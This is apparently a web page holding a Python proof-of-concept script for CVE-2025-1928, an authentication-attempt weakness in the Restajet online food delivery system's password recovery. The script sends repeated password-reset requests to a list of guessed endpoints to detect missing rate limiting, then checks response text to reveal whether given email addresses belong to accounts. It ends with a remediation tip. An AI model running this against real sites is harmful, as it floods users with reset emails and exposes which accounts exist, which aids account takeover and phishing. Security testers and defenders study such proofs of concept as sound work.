CVE-2025-1928 Restajet在线食品配送系统密码恢复认证绕过漏洞

#!/usr/bin/env python3 """ CVE-2025-1928 PoC - Restajet Online Food Delivery System Password Recovery Exploitation Note: This PoC is for educational and authorized testing purposes only. """ import requests import time import sys class CVE2025_1928_PoC: def __init__(self, target_url, target_email=None): self.target_url = target_url.rstrip('/') self.target_email = target_email self.session = requests.Session() self.attempt_count = 0 def check_rate_limit(self): """ Check if the password recovery endpoint has rate limiting """ endpoints = [ '/forgot-password', '/password-reset', '/account/recover', '/user/forgot-password', '/api/password/forgot' ] print(f"[*] Testing password recovery endpoints for rate limiting...") for endpoint in endpoints: url = f"{self.target_url}{endpoint}" print(f"\n[*] Testing: {url}") for i in range(10): try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } data = {'email': self.target_email or f'test{i}@example.com'} response = self.session.post(url, data=data, headers=headers, timeout=10) self.attempt_count += 1 print(f" Request {i+1}: Status={response.status_code}, " f"Response time={response.elapsed.total_seconds():.3f}s") # Check for rate limit response if response.status_code == 429: print(f"[+] Rate limiting detected on {endpoint}") return True elif 'too many requests' in response.text.lower(): print(f"[+] Rate limit message found on {endpoint}") return True time.sleep(0.5) except requests.exceptions.RequestException as e: print(f" Error: {e}") continue print("\n[!] WARNING: No rate limiting detected on password recovery endpoints!") print(f"[!] Made {self.attempt_count} requests without any blocking.") return False def enumerate_users(self, email_list): """ Test for user enumeration via password recovery """ print(f"\n[*] Testing for user enumeration vulnerability...") endpoint = f"{self.target_url}/forgot-password" results = {} for email in email_list: try: response = self.session.post(endpoint, data={'email': email}, timeout=10) # Analyze response for user enumeration if 'not found' in response.text.lower() or 'does not exist' in response.text.lower(): results[email] = 'NOT_EXISTS' print(f" [-] {email}: User does not exist") elif 'sent' in response.text.lower() or 'email' in response.text.lower(): results[email] = 'EXISTS' print(f" [+] {email}: User EXISTS - vulnerable to enumeration!") else: results[email] = 'UNKNOWN' print(f" [?] {email}: Unknown response") except Exception as e: print(f" [!] Error testing {email}: {e}") return results def run_exploit(self): """ Main exploitation routine """ print("=" * 60) print("CVE-2025-1928 PoC - Restajet Online Food Delivery System") print("Improper Restriction of Excessive Authentication Attempts") print("=" * 60) print(f"[*] Target: {self.target_url}") print(f"[*] Starting vulnerability assessment...\n") # Check for rate limiting vulnerability rate_limit_exists = self.check_rate_limit() if not rate_limit_exists: print("\n[!] VULNERABLE: No rate limiting detected!") print("[*] This confirms CVE-2025-1928 vulnerability") # Test user enumeration if email provided if self.target_email: self.enumerate_users([self.target_email]) print("\n[*] Assessment complete.") print("[*] Recommendation: Implement rate limiting and account lockout mechanisms") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-1928.py <target_url> [email]") print("Example: python cve-2025-1928.py http://target.com [email protected]") sys.exit(1) target = sys.argv[1] email = sys.argv[2] if len(sys.argv) > 2 else None poc = CVE2025_1928_PoC(target, email) poc.run_exploit()